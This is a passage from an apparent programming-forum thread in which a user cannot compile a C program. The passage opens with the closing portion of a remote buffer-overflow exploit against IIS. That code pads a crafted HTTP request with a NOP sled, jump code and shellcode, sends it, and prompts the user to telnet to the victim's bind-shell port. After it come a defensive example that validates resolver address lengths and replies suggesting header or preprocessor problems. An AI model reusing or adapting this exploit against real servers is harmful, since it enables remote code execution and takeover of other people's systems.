  for (; j < i+65535-strlen(jumpcode); j++)
        buffer[j] = NOP;

  // Then we skip the body of the HTTP request
  memcpy(&buffer[j], jumpcode, strlen(jumpcode));

  strcpy(buffer+strlen(buffer), " HTTP/1.1\r\n");
  sprintf(buffer+strlen(buffer), "Host: %s\r\nContent-Type: text/xml\r\nContent-Length: %d\r\n\r\n", argv[1], strlen(body) + strlen(shellcode));
  strcpy(buffer+strlen(buffer), body);
 
  // This byte is used to mark the beginning of the shellcode
  memset(buffer+strlen(buffer), 0x01, 1);
 
  // And finally, we land into our shellcode
  memset(buffer+strlen(buffer), NOP, 3);
  strcpy(buffer+strlen(buffer), shellcode);
 
  // Send request
  if (send(s, buffer, strlen(buffer), 0) != strlen(buffer))
        {
          perror("Failed to send");
          exit(-7);
        }

  printf("[*] Now open another console/shell and try to connect (telnet) to victim port %i...\n", bport);

  // Receive response
  while ( (r=recv(s, &buffer[rt], MAXBUF-1, 0)) > 0)
        rt += r;
  // This code is not bullet-proof. An evil WWW server could return a response
  // and an overflow would occur here. Yes, I'm lazy... :-)
 
  buffer[rt] = '\0';
 
  if (rt > 0)
        printf("[*] Victim server issued the following %d bytes of response:\n--\n%s\n--\n[*] Server NOT vulnerable!\n", rt, buffer);
  else
    printf("[*] Server is vulnerable but the exploit failed! Change RET value (e.g. 0xce04) and try again (when IIS is up again) :-/\n", bport);
 
  close(s);

}

0
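As an added example (not code from this thread or from the program's author), here is a small C probe that makes the `dst` question visible at compile time, and that replaces the program's unchecked `bcopy(h->h_addr, &dst.sin_addr, h->h_length)` with a copy that verifies the resolver entry's family and length first. The function names are my own and the `hostent` values are constructed inline rather than coming from a real lookup.

```c
/* Added example: header sanity probe plus a checked way to fill `dst`.
 * Not part of the thread's program; function names are this example's own. */
#include <stddef.h>
#include <string.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <sys/socket.h>

/* If struct sockaddr_in were only an incomplete type (the "storage size of
 * 'dst' isn't known" situation), sizeof() would fail on these two lines, at
 * the top of the file, rather than deep inside main(). The negative-array
 * trick works on pre-C11 compilers such as the gcc 3.2 in the thread. */
typedef char sockaddr_in_is_complete[sizeof(struct sockaddr_in) > 0 ? 1 : -1];
typedef char sockaddr_in_fits_sockaddr[sizeof(struct sockaddr_in) <= sizeof(struct sockaddr) ? 1 : -1];

/* Same layout facts at run time, returned so a caller can assert on them.
 * The cast (struct sockaddr *)&dst in connect() relies on the second one. */
int sockaddr_in_layout_ok(void)
{
    struct sockaddr_in probe;
    return sizeof(probe) == 16
        && sizeof(probe.sin_addr) == 4
        && sizeof(struct sockaddr_in) <= sizeof(struct sockaddr);
}

/* Fill an IPv4 destination from dotted-quad text and a host-order port.
 * Returns 1 on success, 0 if the text is not a valid IPv4 address. */
int build_ipv4_dst(const char *ip_text, unsigned short port, struct sockaddr_in *dst)
{
    memset(dst, 0, sizeof(*dst));          /* also clears the padding bytes */
    dst->sin_family = AF_INET;
    dst->sin_port = htons(port);
    return inet_pton(AF_INET, ip_text, &dst->sin_addr) == 1;
}

/* The posted program copies h_length bytes into the 4-byte sin_addr without
 * looking at h_addrtype. An entry with a longer address (h_length 16 for
 * AF_INET6) would overrun sin_addr. This variant accepts only an exact
 * 4-byte AF_INET entry. Returns 1 on success, 0 otherwise. */
int copy_hostent_addr(const struct hostent *h, unsigned short port, struct sockaddr_in *dst)
{
    if (h == NULL || h->h_addrtype != AF_INET
        || h->h_length != (int)sizeof(dst->sin_addr)
        || h->h_addr_list == NULL || h->h_addr_list[0] == NULL)
        return 0;
    memset(dst, 0, sizeof(*dst));
    dst->sin_family = AF_INET;
    dst->sin_port = htons(port);
    memcpy(&dst->sin_addr, h->h_addr_list[0], sizeof(dst->sin_addr));
    return 1;
}

/* Host-order port read back from a filled sockaddr_in. */
unsigned short dst_port_host_order(const struct sockaddr_in *dst)
{
    return ntohs(dst->sin_port);
}

/* Dotted-quad text of the filled address, written into the caller's buffer. */
const char *dst_addr_text(const struct sockaddr_in *dst, char *buf, size_t buflen)
{
    return inet_ntop(AF_INET, &dst->sin_addr, buf, (socklen_t)buflen);
}

/* Constructed sample resolver entries (not from a real lookup): the check
 * must accept the 4-byte AF_INET entry and refuse the 16-byte AF_INET6 one.
 * Returns 1 when both behave as expected. */
int demo_hostent_checks(void)
{
    static char v4[4] = {10, 0, 0, 5};
    static char v6[16] = {0x20, 0x01, 0x0d, 0xb8};
    static char *v4_list[] = {v4, NULL};
    static char *v6_list[] = {v6, NULL};
    struct hostent h4, h6;
    struct sockaddr_in dst;

    memset(&h4, 0, sizeof(h4));
    memset(&h6, 0, sizeof(h6));
    h4.h_addrtype = AF_INET;  h4.h_length = 4;  h4.h_addr_list = v4_list;
    h6.h_addrtype = AF_INET6; h6.h_length = 16; h6.h_addr_list = v6_list;

    if (!copy_hostent_addr(&h4, 80, &dst)) return 0;
    if (ntohl(dst.sin_addr.s_addr) != 0x0a000005UL) return 0;   /* 10.0.0.5 */
    if (copy_hostent_addr(&h6, 80, &dst)) return 0;             /* must be refused */
    return 1;
}
```

Compiling this file alone on the problem system separates a broken header chain (the typedef lines fail) from a problem in the larger program.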
 
LVL 6

Expert Comment

by:GaryFx
ID: 8247225
I just tried it on RedHat 6.1 with gcc 2.95.2.  I got no errors, though I did get unrelated warnings when I compiled it with -Wall.  

This suggests that the problem is with your .h include files.  Perhaps you're getting the wrong ones, or you don't have the right one, or some preprocessor symbol is misdefined.  It's difficult to say.  Personally, when I'm faced with such problems, I compile with -E which produces the result of the preprocessor.  This lets me see exactly which files are included and whether any sections are skipped due to preprocessor symbols.  But it is a tedious approach.

Gary
0
 

Author Comment

by:MtM
ID: 8249337
Well, that just pisses me off ;-)  I'll figure out how to get this stuff compiled sometime.

MtM
0